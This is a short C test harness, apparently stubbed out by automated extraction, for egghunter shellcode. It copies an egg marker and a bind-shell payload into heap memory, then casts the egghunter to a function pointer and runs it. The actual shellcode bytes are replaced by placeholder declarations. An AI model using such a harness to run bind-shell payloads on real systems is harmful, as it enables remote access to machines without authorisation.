
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ bindshell ;
 scalar_t__ egg ;
 scalar_t__ egghunter ;
 scalar_t__ malloc (int) ;
 int memset (char*,char,int) ;
 int printf (char*,int) ;
 int strlen (scalar_t__) ;
 int strncpy (char*,scalar_t__,int) ;

main()
{

    char *heap = (char*)malloc(1000000);
    memset(heap, '\0', 512);
    strncpy(heap, egg, 4);
    strncpy(heap+4, egg, 4);
    strncpy(heap+8, bindshell, 212);

    printf("Egghunter Length: %d\n", strlen(egghunter));
    printf("Shellcode Length: %d\n", strlen(bindshell));
        int (*ret)() = (int(*)())egghunter;
        ret();
    return 0;
}
